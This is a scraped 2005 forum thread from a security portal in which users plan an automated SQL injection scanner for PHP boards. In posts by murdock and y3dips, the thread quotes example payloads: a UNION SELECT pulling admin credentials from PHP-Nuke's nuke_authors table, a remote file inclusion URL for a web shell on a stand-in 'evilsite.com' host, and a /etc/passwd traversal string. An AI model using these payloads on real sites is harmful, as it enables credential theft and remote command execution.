Waraxe IT Security Portal
Login or Register
November 21, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 89
Members: 0
Total: 89
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> PHP Sql Injection Scanner Plan Goto page Previous1, 2, 3Next
Post new topicReply to topic View previous topic :: View next topic
PostPosted: Fri Apr 08, 2005 4:20 pm Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




murdock wrote:
Httrack....very very nice tool Very Happy

Thanks y3dips!!!


no problemo dude,
im learning the source too Rolling Eyes , even till now im still watching HDM script (metasploit) lol

maybe if u already learn some, than u can share it with me Wink

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Fri Apr 08, 2005 7:53 pm Reply with quote
murdock
Advanced user
Advanced user
Joined: Mar 16, 2005
Posts: 54




I'm finding a way to use this tool to fetch only the urls and put them into a text file without downloading the pages. I 'm reading the source code of the library, but it's in C and....I'm a little lost in C languange Crying or Very sad. I will try to use the compiled command line version of httrack in my project, yes, I know, it's too lame, but I'm a VB/Delphi programmer (auto-learned), and a poor C programmer (I'm studying Computer Science, but my f*cking university seems to give more priority to maths learning than C programming learning). And the biggest problem is that I have absolutly NO IDEA of GUIs programming in VisualC++, and I need a GUI for making treeviews and itemlists Sad
View user's profile Send private message
PostPosted: Fri Apr 08, 2005 11:59 pm Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




yes, that the point, just save all url cache by httrack Smile n use it for your own sake
yes again, it was written in C ..
even my project will be written in PERL but i trying to understand it n do some porting Sad (if i cant, manybe i just like you, USING compiled command line version Laughing)

safe more time for your research , even it not easy to be implemented with our program n will decrease our program time during the 'compiled' program that we use (if we dont implement the source)

Wink

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sat Apr 09, 2005 4:47 am Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




Yeah sex = 16
beer = 18 (but nobody listens to that)
Full drivers license = 16 and a half
Smoking = 18 (but nobody cares)

Yeah we have lots of fun.

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Sun Apr 10, 2005 12:44 pm Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




shai-tan wrote:
Yeah sex = 16
beer = 18 (but nobody listens to that)
Full drivers license = 16 and a half
Smoking = 18 (but nobody cares)

Yeah we have lots of fun.


woops , what are you type in here shai-tan Smile Laughing

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sun Apr 10, 2005 1:53 pm Reply with quote
murdock
Advanced user
Advanced user
Joined: Mar 16, 2005
Posts: 54




Shai-tan: It's like where i live, in Spain, with the difference that here sex it's at 15 years and driving at 18.

Y3dips, I have a question for you:
I read the help in the command line version of httrack but it's in complicated english for me and I didn't find how to use the parameters to get what I want, any ideas? Thanks
View user's profile Send private message
PostPosted: Tue Apr 12, 2005 8:20 am Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




And I can do all those things while on the net. Well except drive.

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Fri Apr 15, 2005 12:24 am Reply with quote
dairy123
Beginner
Beginner
Joined: Feb 13, 2005
Posts: 4




murdock wrote:
I'm finding a way to use this tool to fetch only the urls and put them into a text file without downloading the pages. I 'm reading the source code of the library, but it's in C and....I'm a little lost in C languange Crying or Very sad. I will try to use the compiled command line version of httrack in my project, yes, I know, it's too lame, but I'm a VB/Delphi programmer (auto-learned), and a poor C programmer (I'm studying Computer Science, but my f*cking university seems to give more priority to maths learning than C programming learning). And the biggest problem is that I have absolutly NO IDEA of GUIs programming in VisualC++, and I need a GUI for making treeviews and itemlists Sad


Kind of late to this discussion but let me thrown in some ideas too. Laughing

I would say not to worry about the UI part yet, first to get the spidering - collection of URLs and arranging them etc to work. I would keep all the components as separate as possible but flexible enough to integrate them with a GUI later on. By components ( they could be as simple as a class file) I mean,

1. the part that fetches the sql injection worthy URLs and keeps them in lists - the spider, url harvester whatever you like to call it

2. the rules loader ( this will be something to help in step 1 ) which has set of rules for a given site or say a type of board - like phpbb, invision etc. Each vulnerability might be potentially written as a rule with a pattern-matching expression ? This will help determine if the URLs are sql-injection worthy (in step 1) or not

3. The actual injector - which sends in actual requests, using post or get -
to the board software - again based on some pre-written rules maybe like generic SQL qury, UNION statements etc.

4. The Interpreter - which in simplest terms is a logger of results returned by the site - (maybe a text dump or a gui based browser window) to display the results gotten from the server. in case the

each of the above components can be as small as possible and can piggy-back already existing scripts like - say the spider piggybacks on httrack - etc.

i know i am talking way over myself but just some ideas Laughing
View user's profile Send private message
PostPosted: Fri Apr 15, 2005 6:26 pm Reply with quote
murdock
Advanced user
Advanced user
Joined: Mar 16, 2005
Posts: 54




Yes dairy123! That's it!
But It will be more simple, imagine a form with 2 textboxs:

-Textbox to insert what to test with the php variable:
Example: "-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*"
(for a SQL Injection)
Or: "http://evilsite.com/shell.php?cmd=ls"
(for a RFI test)
Or: "../../../../../../etc/passwd"
(for directory transversal test)

-Textbox to insert the "pattern" too see if the exploit worked:
Example:
"SQL"
(if the returned page has a SQL Query error, it will contain the word "SQL" in the html code, so the exploit worked)
Or: "Infektion Shell"
(if the RFI worked, the returned page should contain the title of the php shell, so the exploit worked)
Or: "root:"
(if the directory transversal worked, "root:" should appear in returnet page!)

These textbox will be free to change but i'm planning to add some list of pre-defined ones with the typical exploits like the 3 examples I said. And add also the option to load a pre-defined one from a file (maybe from a .ini file?).

This will make the tool ready to add more exploit tricks easily.

Note: I have problems with httrack (commented in my previous post), anyone can help me? thanks!
View user's profile Send private message
PostPosted: Sat Apr 16, 2005 12:57 pm Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




murdock wrote:
Yes dairy123! That's it!
But It will be more simple, imagine a form with 2 textboxs:

-Textbox to insert what to test with the php variable:
Example: "-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*"
(for a SQL Injection)
Or: "http://evilsite.com/shell.php?cmd=ls"
(for a RFI test)
Or: "../../../../../../etc/passwd"
(for directory transversal test)

-Textbox to insert the "pattern" too see if the exploit worked:
Example:
"SQL"
(if the returned page has a SQL Query error, it will contain the word "SQL" in the html code, so the exploit worked)
Or: "Infektion Shell"
(if the RFI worked, the returned page should contain the title of the php shell, so the exploit worked)
Or: "root:"
(if the directory transversal worked, "root:" should appear in returnet page!)

These textbox will be free to change but i'm planning to add some list of pre-defined ones with the typical exploits like the 3 examples I said. And add also the option to load a pre-defined one from a file (maybe from a .ini file?).

This will make the tool ready to add more exploit tricks easily.

Note: I have problems with httrack (commented in my previous post), anyone can help me? thanks!


hm, i found that there are some equal project we are working
what language are you using for ur project ?

maybe we can share Smile
exploit`s library maybe ?

fyi : * now im focusing on RFI first n im writing an article for echo ezine issue #11 about my project

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sat Apr 16, 2005 1:32 pm Reply with quote
murdock
Advanced user
Advanced user
Joined: Mar 16, 2005
Posts: 54




I planned to use VB first for GUI reasons, but I think I will change, what language do you use y3dips?
View user's profile Send private message
PostPosted: Sun Apr 17, 2005 1:12 am Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




If I were you I wouldnt use VB Id use PB Pure Basic. Download the Gambas gzip for Linux, compile and use that.

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Sun Apr 17, 2005 5:48 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




murdock wrote:
I planned to use VB first for GUI reasons, but I think I will change, what language do you use y3dips?


im going to using perl,
maybe with LWP module (give some easy way then using socket)

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sun Apr 17, 2005 10:11 am Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




Basic really is for those starting to program. We are lucky we have languages like PHP. I dont like Perl at all. I really like python though. Rather easy. I havent had experience in much programming besides php.

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Sun Apr 17, 2005 5:00 pm Reply with quote
erg0t
Valuable expert
Valuable expert
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay




In windows you can do GUI very easy, you can do it in C even in assembler, only using resources. You get a resource editor, then you make the GUI in a visual form, save de file, and then when you are going to link the program you make de resource file in.
Smile
View user's profile Send private message Send e-mail Visit poster's website
PHP Sql Injection Scanner Plan
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 2 of 3
Goto page Previous1, 2, 3Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.052 Seconds